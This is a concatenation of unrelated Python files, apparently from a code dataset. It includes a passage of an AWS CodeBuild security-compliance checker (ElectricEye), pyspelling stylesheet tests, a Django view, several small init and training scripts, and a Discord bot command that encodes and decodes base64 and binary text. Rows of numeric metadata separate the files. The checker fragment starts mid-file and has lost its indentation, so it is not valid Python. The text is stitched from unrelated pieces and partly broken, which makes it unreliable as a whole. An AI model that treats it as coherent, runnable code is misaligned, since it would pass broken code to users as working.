"ISO 27001:2013 A.9.2.6",
"ISO 27001:2013 A.9.3.1",
"ISO 27001:2013 A.9.4.2",
"ISO 27001:2013 A.9.4.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("codebuild")
def s3_logging_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.4] CodeBuild projects should not have S3 log encryption disabled"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if this project disabled s3 log encryption
s3EncryptionCheck = str(projects["logsConfig"]["s3Logs"]["encryptionDisabled"])
if s3EncryptionCheck == "True":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/s3-encryption",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.4] CodeBuild projects should not have S3 log encryption disabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has S3 log encryption disabled. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have S3 log encryption disabled refer to #20 in the Change a Build Projects Settings (AWS CLI) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/s3-encryption",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.4] CodeBuild projects should not have S3 log encryption disabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has S3 log encryption enabled.",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have S3 log encryption disabled refer to #20 in the Change a Build Projects Settings (AWS CLI) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("codebuild")
def cloudwatch_logging_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.5] CodeBuild projects should have CloudWatch logging enabled"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if this project logs to cloudwatch
codeBuildLoggingCheck = str(projects["logsConfig"]["cloudWatchLogs"]["status"])
if codeBuildLoggingCheck != "ENABLED":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/cloudwatch-logging",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.5] CodeBuild projects should have CloudWatch logging enabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has CloudWatch logging disabled. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have CloudWatch logging disabled refer to #20 in the Change a Build Projects Settings (AWS CLI) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/cloudwatch-logging",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.5] CodeBuild projects should have CloudWatch logging enabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has CloudWatch logging enabled.",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have CloudWatch logging disabled refer to #20 in the Change a Build Projects Settings (AWS CLI) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding | 51.622585 | 203 | 0.467331 | 2,764 | 34,742 | 5.855644 | 0.111795 | 0.02076 | 0.03114 | 0.03806 | 0.872598 | 0.86642 | 0.86333 | 0.860921 | 0.860426 | 0.856781 | 0 | 0.056483 | 0.42925 | 34,742 | 673 | 204 | 51.622585 | 0.759746 | 0.047752 | 0 | 0.832013 | 0 | 0.031696 | 0.376877 | 0.027973 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009509 | false | 0.007924 | 0.004754 | 0 | 0.019017 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
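The three checks above each reduce to a small per-project predicate before building their ASFF findings. A condensed sketch (not part of ElectricEye itself) of those predicates — the key names mirror the `batch_get_projects` response fields used in the code:

```python
def has_plaintext_env_vars(project: dict) -> bool:
    """True if any environment variable is stored as PLAINTEXT
    rather than in Parameter Store or Secrets Manager."""
    env_vars = project.get("environment", {}).get("environmentVariables", [])
    return any(str(var.get("type")) == "PLAINTEXT" for var in env_vars)

def s3_log_encryption_disabled(project: dict) -> bool:
    """True when the project has opted out of S3 log encryption."""
    return bool(project["logsConfig"]["s3Logs"]["encryptionDisabled"])

def cloudwatch_logging_enabled(project: dict) -> bool:
    """True when build logs are shipped to CloudWatch Logs."""
    return project["logsConfig"]["cloudWatchLogs"]["status"] == "ENABLED"
```

Each check then yields a FAILED/ACTIVE finding when its predicate flags the project, and a PASSED/ARCHIVED finding otherwise.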
a23005892a9619a99d8c537d4a38fdcf9de06cdf | 5,721 | py | Python | tests/filters/test_stylesheets.py | wolf99/pyspelling | 8811d0be2991c6a1f2b3deda752a20c1d889bada | [
"MIT"
] | null | null | null | tests/filters/test_stylesheets.py | wolf99/pyspelling | 8811d0be2991c6a1f2b3deda752a20c1d889bada | [
"MIT"
] | null | null | null | tests/filters/test_stylesheets.py | wolf99/pyspelling | 8811d0be2991c6a1f2b3deda752a20c1d889bada | [
"MIT"
] | null | null | null | """Test stylesheets plugin."""
from .. import util
class TestStylesheetsCSS(util.PluginTestCase):
"""Test stylesheets CSS plugin."""
def setup_fs(self):
"""Setup file system."""
config = self.dedent(
"""
matrix:
- name: css
sources:
- '{}/**/*.txt'
aspell:
lang: en
hunspell:
d: en_US
pipeline:
- pyspelling.filters.stylesheets:
stylesheets: css
group_comments: true
"""
).format(self.tempdir)
self.mktemp('.stylesheets_css.yml', config, 'utf-8')
def test_stylesheets_css(self):
"""Test stylesheets CSS."""
bad_words = ['flga', 'graet']
good_words = ['yes', 'word']
template = self.dedent(
"""
/*
{}
*/
p#id.class, p.other_id.class {{
color: white;
}}
"""
).format(
'\n'.join(bad_words + good_words)
)
self.mktemp('test.txt', template, 'utf-8')
self.assert_spellcheck('.stylesheets_css.yml', bad_words)
class TestStylesheetsSCSS(util.PluginTestCase):
"""Test stylesheets SCSS plugin."""
def setup_fs(self):
"""Setup file system."""
config = self.dedent(
"""
matrix:
- name: scss
sources:
- '{}/**/*.txt'
aspell:
lang: en
hunspell:
d: en_US
pipeline:
- pyspelling.filters.stylesheets:
stylesheets: scss
group_comments: true
"""
).format(self.tempdir)
self.mktemp('.stylesheets_scss.yml', config, 'utf-8')
def test_stylesheets_scss(self):
"""Test stylesheets SCSS."""
bad_block = ['helo', 'begn']
bad_comments = ['flga', 'graet']
bad_comments2 = ['recieve', 'teh']
bad_words = bad_block + bad_comments + bad_comments2
good_words = ['yes', 'word']
template = self.dedent(
"""
/*
{}
*/
@mixin cover {{
$color: red;
// {}
// {}
@for $i from 1 through 5 {{
&.bg-cover#{{$i}} {{ background-color: adjust-hue($color, 15deg * $i) }}
}}
}}
.wrapper {{ @include cover }}
"""
).format(
'\n'.join(bad_block + good_words),
' '.join(bad_comments + good_words),
' '.join(bad_comments2 + good_words)
)
self.mktemp('test.txt', template, 'utf-8')
self.assert_spellcheck('.stylesheets_scss.yml', bad_words)
class TestStylesheetsSASS(util.PluginTestCase):
"""Test stylesheets SASS plugin."""
def setup_fs(self):
"""Setup file system."""
config = self.dedent(
"""
matrix:
- name: sass
sources:
- '{}/**/*.txt'
aspell:
lang: en
hunspell:
d: en_US
pipeline:
- pyspelling.filters.stylesheets:
stylesheets: sass
group_comments: true
"""
).format(self.tempdir)
self.mktemp('.stylesheets_sass.yml', config, 'utf-8')
def test_stylesheets_sass(self):
"""Test stylesheets SASS."""
bad_block = ['helo', 'begn']
bad_comments = ['flga', 'graet']
bad_comments2 = ['recieve', 'teh']
bad_words = bad_block + bad_comments + bad_comments2
good_words = ['yes', 'word']
template = self.dedent(
"""
/*
{}
*/
=cover
$color: red
// {}
// {}
@for $i from 1 through 5
&.bg-cover#{{$i}}
background-color: adjust-hue($color, 15deg * $i)
.wrapper
+cover
"""
).format(
'\n'.join(bad_block + good_words),
' '.join(bad_comments + good_words),
' '.join(bad_comments2 + good_words)
)
self.mktemp('test.txt', template, 'utf-8')
self.assert_spellcheck('.stylesheets_sass.yml', bad_words)
class TestStylesheetsCSSChained(util.PluginTestCase):
"""Test chained stylesheets CSS plugin."""
def setup_fs(self):
"""Setup file system."""
config = self.dedent(
"""
matrix:
- name: css
sources:
- '{}/**/*.txt'
aspell:
lang: en
hunspell:
d: en_US
pipeline:
- pyspelling.filters.text:
- pyspelling.filters.stylesheets:
stylesheets: css
group_comments: true
"""
).format(self.tempdir)
self.mktemp('.stylesheets_css.yml', config, 'utf-8')
def test_stylesheets_css_after_text(self):
"""Test stylesheets CSS."""
bad_words = ['flga', 'graet']
good_words = ['yes', 'word']
template = self.dedent(
"""
/*
{}
*/
p#id.class, p.other_id.class {{
color: white;
}}
"""
).format(
'\n'.join(bad_words + good_words)
)
self.mktemp('test.txt', template, 'utf-8')
self.assert_spellcheck('.stylesheets_css.yml', bad_words)
| 27.771845 | 88 | 0.449747 | 490 | 5,721 | 5.095918 | 0.17551 | 0.072087 | 0.036043 | 0.025631 | 0.845415 | 0.845415 | 0.845415 | 0.820585 | 0.820585 | 0.776532 | 0 | 0.006601 | 0.41741 | 5,721 | 205 | 89 | 27.907317 | 0.742574 | 0.055235 | 0 | 0.746269 | 0 | 0 | 0.121636 | 0.02936 | 0 | 0 | 0 | 0 | 0.059701 | 1 | 0.119403 | false | 0 | 0.014925 | 0 | 0.19403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
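The test classes above all follow the same setup pattern: dedent a triple-quoted YAML template and substitute the temp directory into the source glob. A standalone sketch of that pattern using stdlib `textwrap` (which `util.PluginTestCase.dedent` presumably wraps — an assumption, not confirmed by this file):

```python
import textwrap

def render_config(tempdir: str) -> str:
    # Dedent the indented triple-quoted template, then inject the
    # temporary directory into the '{}/**/*.txt' source glob.
    template = textwrap.dedent(
        """
        matrix:
        - name: css
          sources:
          - '{}/**/*.txt'
          pipeline:
          - pyspelling.filters.stylesheets:
              stylesheets: css
        """
    )
    return template.format(tempdir)
```

Note that the test templates double their literal braces (`{{` / `}}`) because `.format` treats single braces as placeholders; this sketch contains no CSS braces, so no escaping is needed.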
a24a2dc42b742ccdbf12588f8cb295913ed98098 | 120 | py | Python | cocoa/views.py | volterra-luo/cocoa | 469e1ed2348c32bd8f9f043b1d673d30d65bd62e | [
"MIT"
] | null | null | null | cocoa/views.py | volterra-luo/cocoa | 469e1ed2348c32bd8f9f043b1d673d30d65bd62e | [
"MIT"
] | null | null | null | cocoa/views.py | volterra-luo/cocoa | 469e1ed2348c32bd8f9f043b1d673d30d65bd62e | [
"MIT"
] | null | null | null | from django.http import HttpResponse
from django.shortcuts import render
def home(request):
return HttpResponse('ok')
| 20 | 36 | 0.808333 | 16 | 120 | 6.0625 | 0.75 | 0.206186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116667 | 120 | 5 | 37 | 24 | 0.915094 | 0 | 0 | 0 | 0 | 0 | 0.016667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
a2839a24e8fc775d99a4e9205c383e00e0071d6d | 130 | py | Python | retinopathy/__init__.py | chinmayhegde/retinopathy-detection | 26e23ea24e501a9af21d1145e8c4122fa21fe975 | [
"MIT"
] | null | null | null | retinopathy/__init__.py | chinmayhegde/retinopathy-detection | 26e23ea24e501a9af21d1145e8c4122fa21fe975 | [
"MIT"
] | null | null | null | retinopathy/__init__.py | chinmayhegde/retinopathy-detection | 26e23ea24e501a9af21d1145e8c4122fa21fe975 | [
"MIT"
] | null | null | null | import svm_classifier
import sys
# TODO this is a terrible hack and needs fixed
sys.modules['svm_classifier'] = svm_classifier
| 16.25 | 46 | 0.792308 | 20 | 130 | 5 | 0.7 | 0.39 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 130 | 7 | 47 | 18.571429 | 0.909091 | 0.338462 | 0 | 0 | 0 | 0 | 0.168675 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a2acbf4ee9a4f3ae02444b002f453e4ff34e8333 | 95 | py | Python | venv/Lib/site-packages/nornir_utils/plugins/functions/__init__.py | melihteke/ebook_study | 4848ea42e37ee1d6ec777bfc33f49984653ace34 | [
"MIT"
] | 19 | 2020-04-13T20:35:16.000Z | 2022-03-30T08:04:28.000Z | venv/Lib/site-packages/nornir_utils/plugins/functions/__init__.py | melihteke/ebook_study | 4848ea42e37ee1d6ec777bfc33f49984653ace34 | [
"MIT"
] | 13 | 2020-05-27T16:46:12.000Z | 2022-03-30T11:12:37.000Z | venv/Lib/site-packages/nornir_utils/plugins/functions/__init__.py | melihteke/ebook_study | 4848ea42e37ee1d6ec777bfc33f49984653ace34 | [
"MIT"
] | 11 | 2020-04-27T22:57:08.000Z | 2021-12-20T18:02:04.000Z | from .print_result import print_result, print_title
__all__ = ("print_result", "print_title")
| 23.75 | 51 | 0.789474 | 13 | 95 | 5.076923 | 0.461538 | 0.5 | 0.484848 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 95 | 3 | 52 | 31.666667 | 0.776471 | 0 | 0 | 0 | 0 | 0 | 0.242105 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
0c20cdd2bb59eb468c296787d19e190031e7e488 | 366 | py | Python | src/learn/bots/train_all.py | benjaminaaron/GO_DILab | 20630d1a1d513a25de20b2edaeeac097a1b53be4 | [
"MIT"
] | 8 | 2017-10-19T21:21:27.000Z | 2018-01-31T14:36:21.000Z | src/learn/bots/train_all.py | benjaminaaron/GO_DILab | 20630d1a1d513a25de20b2edaeeac097a1b53be4 | [
"MIT"
] | 9 | 2017-10-19T15:28:09.000Z | 2017-12-05T11:42:44.000Z | src/learn/bots/train_all.py | nathanaelbosch/GO_DILab | 20630d1a1d513a25de20b2edaeeac097a1b53be4 | [
"MIT"
] | 1 | 2018-04-23T17:36:35.000Z | 2018-04-23T17:36:35.000Z | """Train all models!"""
from src.learn.bots._32.learn import Learn
Learn().run()
from src.learn.bots._31.learn import Learn
Learn().run()
from src.learn.bots._21.learn import Learn
Learn().run()
from src.learn.bots._22.learn import Learn
Learn().run()
from src.learn.bots._12.learn import Learn
Learn().run()
from src.learn.bots._11.learn import Learn
Learn().run()
| 26.142857 | 42 | 0.743169 | 63 | 366 | 4.222222 | 0.238095 | 0.157895 | 0.270677 | 0.360902 | 0.842105 | 0.75188 | 0.75188 | 0.75188 | 0.75188 | 0 | 0 | 0.036036 | 0.090164 | 366 | 13 | 43 | 28.153846 | 0.762763 | 0.046448 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
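The six import-and-run pairs above rebind the name `Learn` from sibling packages, shadowing the previous binding each time. The same sequence can be expressed with `importlib` — a sketch only, with the dotted module paths taken from the imports above:

```python
import importlib

# Bot packages in the same order the script runs them.
BOT_PACKAGES = ["_32", "_31", "_21", "_22", "_12", "_11"]

def module_paths(package_root: str = "src.learn.bots") -> list:
    """Build the dotted paths of each bot's learn module."""
    return [f"{package_root}.{name}.learn" for name in BOT_PACKAGES]

def train_all() -> None:
    """Import each learn module and run its Learn class, in order."""
    for path in module_paths():
        importlib.import_module(path).Learn().run()
```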
a761f0257da0de0908cbd6eb7043f3fa5b9e7388 | 162 | py | Python | xdrawio/arch/arch_level3.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | null | null | null | xdrawio/arch/arch_level3.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | 1 | 2020-05-29T08:41:23.000Z | 2020-05-29T08:41:23.000Z | xdrawio/arch/arch_level3.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | null | null | null | from xdrawio.arch.dataloader import Data
from xdrawio.arch.datatypes import Domain, Group, Page
def generate_layout_spec_level_3(d: Data, page: Page):
pass
| 23.142857 | 54 | 0.790123 | 25 | 162 | 4.96 | 0.72 | 0.177419 | 0.241935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007143 | 0.135802 | 162 | 6 | 55 | 27 | 0.878571 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
a78287f11158924c6f6e1f9f5d1383a7298001a9 | 6,820 | py | Python | discord_bot/d_commands/codec.py | Mr-Jaxee/Console | 7c042ad51310aaeef76a497a6e96a4ef2a108e6a | [
"MIT"
] | null | null | null | discord_bot/d_commands/codec.py | Mr-Jaxee/Console | 7c042ad51310aaeef76a497a6e96a4ef2a108e6a | [
"MIT"
] | null | null | null | discord_bot/d_commands/codec.py | Mr-Jaxee/Console | 7c042ad51310aaeef76a497a6e96a4ef2a108e6a | [
"MIT"
] | null | null | null | import base64
import binascii
async def decoder(bot, discord, message, botconfig, os, platform, datetime, one_result, localization, embed_color, args, binary, prefix):
if " ".join(args[2:]) == "" or " ".join(args[2:]) == " " or " ".join(args[2:]) == None:
no_args = discord.Embed(title=localization[1][14][0], description=str(localization[1][14][8]).format(prefix), color=embed_color)
return await message.channel.send(embed=no_args)
decoder_content = discord.Embed(title=localization[1][14][0], description=localization[1][14][1] + "\n\n" + localization[1][14][3], color=embed_color)
msg = await message.channel.send(embed=decoder_content)
await msg.add_reaction(emoji="1️⃣")
await msg.add_reaction(emoji="2️⃣")
await msg.add_reaction(emoji="3️⃣")
await msg.add_reaction(emoji="4️⃣")
@bot.event
async def on_reaction_add(reaction, user):
channel = reaction.message.channel
if reaction.emoji == "1️⃣" and user.id != bot.user.id:
try:
result = base64.standard_b64decode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=str(localization[1][14][0]), color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "2️⃣" and user.id != bot.user.id:
try:
result = base64.b32decode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "3️⃣" and user.id != bot.user.id:
try:
result = base64.b16decode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "4️⃣" and user.id != bot.user.id:
try:
result = str(binary.decode(" ".join(args[2:])))
except Exception as e:
print(e)
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
async def encoder(bot, discord, message, botconfig, os, platform, datetime, one_result, localization, embed_color, args, binary, prefix):
if " ".join(args[2:]) == "" or " ".join(args[2:]) == " " or " ".join(args[2:]) == None:
no_args = discord.Embed(title=localization[1][14][0], description=str(localization[1][14][8]).format(prefix), color=embed_color)
return await message.channel.send(embed=no_args)
decoder_content = discord.Embed(title=localization[1][14][0], description=localization[1][14][2] + "\n\n" + localization[1][14][3], color=embed_color)
msg = await message.channel.send(embed=decoder_content)
await msg.add_reaction(emoji="1️⃣")
await msg.add_reaction(emoji="2️⃣")
await msg.add_reaction(emoji="3️⃣")
await msg.add_reaction(emoji="4️⃣")
@bot.event
async def on_reaction_add(reaction, user):
channel = reaction.message.channel
if reaction.emoji == "1️⃣" and user.id != bot.user.id:
try:
result = base64.standard_b64encode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value="```" + str(result) + "```", inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "2️⃣" and user.id != bot.user.id:
try:
result = base64.b32encode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value="```" + str(result) + "```", inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "3️⃣" and user.id != bot.user.id:
try:
result = base64.b16encode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value="```" + str(result) + "```", inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "4️⃣" and user.id != bot.user.id:
try:
args_str = " ".join(args[2:])
result = ""
for letter in list(args_str):
try:
result += binary.encode()[letter]
except Exception as e:
print(e)
result += ''
except Exception as e:
result = localization[1][14][6]
print(e)
try:
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
except:
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value=localization[1][14][7], inline=True)
try:
await msg.edit(content=str('```' + str(result) + '```'), embed=decoder_result_content)
except:
await msg.edit(content='', embed=decoder_result_content)
async def get_help(bot, discord, message, botconfig, os, platform, datetime, one_result, localization, embed_color, prefix):
help_content = discord.Embed(title=localization[1][14][0], description=str(localization[1][14][5]).format(prefix), color=embed_color)
